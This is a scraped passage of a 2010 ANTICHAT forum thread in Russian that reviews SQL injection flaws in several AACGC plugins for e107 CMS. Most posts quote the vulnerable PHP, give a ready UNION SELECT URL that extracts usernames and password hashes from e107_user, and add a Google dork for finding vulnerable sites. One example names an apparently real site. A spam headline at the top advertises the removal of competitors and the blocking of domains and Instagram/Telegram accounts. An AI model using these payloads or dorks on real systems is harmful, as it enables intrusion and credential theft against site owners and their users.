УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
[ Обзор уязвимостей e107 cms ]

Страница 9 из 11

« Первая

Опции темы

Поиск в этой теме

Опции просмотра

#81

10.12.2010, 23:59

Unknown

Guest

Сообщений: n/a

Провел на форуме:
34733

Репутация: 83

AACGC Arcade Addons V3.3

SQL Injection:

/Category.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

if ([/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]];

        unset([/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]);}

...

[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]mySQLresult[/COLOR][COLOR="#007700"]= @[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]MPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"arcade_categories WHERE cat_id =[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);

...[/COLOR][/COLOR]

Пример:

Код:

Code:
http://e107games.net/e107_plugins/aacgc_arcade_addins/Category.php?det.-1%20union%20select%201,2,3,4,5,6--

Путь:

http://e107/e107_plugins/aacgc_arcade_addins/Alternate_Arcade_Main_menu.php

http://e107/e107_plugins/aacgc_arcade_addins/Arcade_Champ_menu.php

http://e107/e107_plugins/aacgc_arcade_addins/Arcade_Favorites_menu.php

http://e107/e107_plugins/aacgc_arcade_addins/Challenge_Champ_menu.php

etc...

Дорк:inurl:e107_plugins/aacgc_arcade_addins/

Если боян - извиняйте.

#82

11.12.2010, 00:58

Unknown

Guest

Сообщений: n/a

Провел на форуме:
34733

Репутация: 83

AACGC CMMS v1.2

Необохдимы права администратора, SQL Injection:

/admin_edit_cat.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

if ([/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];

        unset([/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]);

}

...

[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"aacgc_bt_cat"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"cat_id =[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);

...

[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]mySQLresult[/COLOR][COLOR="#007700"]= @[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]MPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"arcade_categories WHERE cat_id =[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);

...[/COLOR][/COLOR]

Пример:

Код:

Code:
http://e107/e107_plugins/aacgc_btracker/admin_edit_cat.php?edit.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password)%20from%20e107_user--

SQL Injection:

/Bracket_Details.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

if ([/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]];

        unset([/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]);

}

...

[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"aacgc_bt_cat"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"WHERE cat_id=[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]);

...[/COLOR][/COLOR]

Пример:

Код:

Code:
http://e107/e107_plugins/aacgc_btracker/Bracket_Details.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password)%20from%20e107_user--

Путь:

http://e107/e107_plugins/aacgc_btracker/admin_menu.php

Дорк:inurl:e107_plugins/aacgc_btracker/

#83

11.12.2010, 11:38

Unknown

Guest

Сообщений: n/a

Провел на форуме:
34733

Репутация: 83

AACGC Tracker V1.2

Необохдимы права администратора, SQL Injection:

/admin_edit_cat.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

if ([/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];

        unset([/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]);

}

...

[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"aacgc_tracker_cat"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"track_cat_id, track_cat_name"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"track_cat_id =[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);

...[/COLOR][/COLOR]

Пример:

Код:

Code:
http://e107/e107_plugins/aacgc_tracker/admin_edit_cat.php?edit.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password)%20from%20e107_user--

SQL Injection:

/Tracker.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

if ([/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]];

        unset([/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]);

}

...

[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"aacgc_tracker"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"WHERE track_cat=[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]);

...

[/COLOR][/COLOR]

Пример:

Код:

Code:
http://e107/e107_plugins/aacgc_tracker/Tracker.php?det.-1%20union%20select%201,2,3,concat_ws(0x3a,user_name,user_password),5,6%20from%20e107_user--

SQL Injection:

/Tracker_Details.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

if ([/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]];

        unset([/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]);

}

...

[/COLOR][COLOR="#0000BB"]$sql3[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"aacgc_tracker"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"WHERE track_id=[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]);

...

[/COLOR][/COLOR]

Пример:

Код:

Code:
http://e107/e107_plugins/aacgc_tracker/Tracker_Details.php?det.-1%20union%20select%201,2,3,concat_ws(0x3a,user_name,user_password),5,6%20from%20e107_user--

Путь:

http://e107/e107_plugins/aacgc_tracker/admin_menu.php

Дорк:inurl:e107_plugins/aacgc_tracker/

#84

11.12.2010, 14:51

Unknown

Guest

Сообщений: n/a

Провел на форуме:
34733

Репутация: 83

AACGC MIA List V1.3

Необохдимы права администратора, SQL Injection:

/admin_edit.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

if ([/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"edit"[/COLOR][COLOR="#007700"])

{

[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"aacgc_mialist"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"WHERE mia_id=[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Fetch[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$sql2[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$sql2[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"user"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"WHERE user_id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mia_user'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$row2[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$sql2[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Fetch[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$sql3[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$sql3[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"user"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$rows[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$sql3[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Rows[/COLOR][COLOR="#007700"]();

        for ([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]db_Fetch[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$options[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$option[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_name'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];}

...[/COLOR][/COLOR]

Пример:

Код:

Code:
http://e107/e107_plugins/aacgc_mialist/admin_edit.php?edit.-1%20union%20select%20concat_ws(0x3a,user_name,user_password),2222,3333%20from%20e107_user%20limit%200,1--

Вывод внизу в исходнике

Цитата:

Сообщение от None

Путь:

http://e107/e107_plugins/aacgc_mialist/MIA_List_menu.php

http://e107/e107_plugins/aacgc_mialist/admin_menu.php

Дорк:inurl:e107_plugins/aacgc_mialist/

#85

11.12.2010, 17:01

Unknown

Guest

Сообщений: n/a

Провел на форуме:
34733

Репутация: 83

AACGC Trophy Room V1.5

Необохдимы права администратора, SQL Injection:

/admin_edit_event.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

if ([/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];

        unset([/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]);

}

...

if ([/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"edit"[/COLOR][COLOR="#007700"])

{

[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"aacgc_trophy_room"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"event_id =[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Fetch[/COLOR][COLOR="#007700"]();

...[/COLOR][/COLOR]

Пример:

Код:

Code:
http://e107/e107_plugins/aacgc_trophy_room/admin_edit_event.php?edit.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5%20from%20e107_user--

SQL Injection:

/Event_Details.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

if ([/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]];

        unset([/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]);

}

}

...

[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"aacgc_trophy_room"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"WHERE event_id =[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Fetch[/COLOR][COLOR="#007700"]();

...[/COLOR][/COLOR]

Пример:

Код:

Code:
http://e107/e107_plugins/aacgc_trophy_room/Event_Details.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5%20from%20e107_user--

Путь:

http://e107/e107_plugins/aacgc_trophy_room/admin_menu.php

Дорк:inurl:e107_plugins/aacgc_trophy_room/

#86

11.12.2010, 17:58

Unknown

Guest

Сообщений: n/a

Провел на форуме:
34733

Репутация: 83

AACGC Clan Listing V2.0

Необохдимы права администратора, SQL Injection:

/admin_edit.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"clan_listing"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"ORDER BY clan_id ASC"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]);

        while([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Fetch[/COLOR][COLOR="#007700"]()){

[/COLOR][COLOR="#0000BB"]$sql2[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"clan_listing_cat"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"WHERE clan_cat_id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'clan_cat'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]);

...[/COLOR][/COLOR]

Пример:

Код:

Code:
http://e107/e107_plugins/clan_listing/admin_edit.php?edit.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5,6%20from%20e107_user--

SQL Injection:

/Clans.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

if ([/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]];

        unset([/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]);

}

...

[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"clan_listing_cat"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"WHERE clan_cat_id=[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$catname[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Fetch[/COLOR][COLOR="#007700"]();

...[/COLOR][/COLOR]

Пример:

Код:

Code:
http://e107/e107_plugins/clan_listing/Clans.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5,6%20from%20e107_user--

Путь:

http://e107/e107_plugins/clan_listing/admin_menu.php

Дорк:inurl:e107_plugins/clan_listing/

#87

11.12.2010, 21:14

Unknown

Guest

Сообщений: n/a

Провел на форуме:
34733

Репутация: 83

AACGC Product Listing V1.4

SQL Injection:

/Product_Sub_Categories.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

if ([/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];

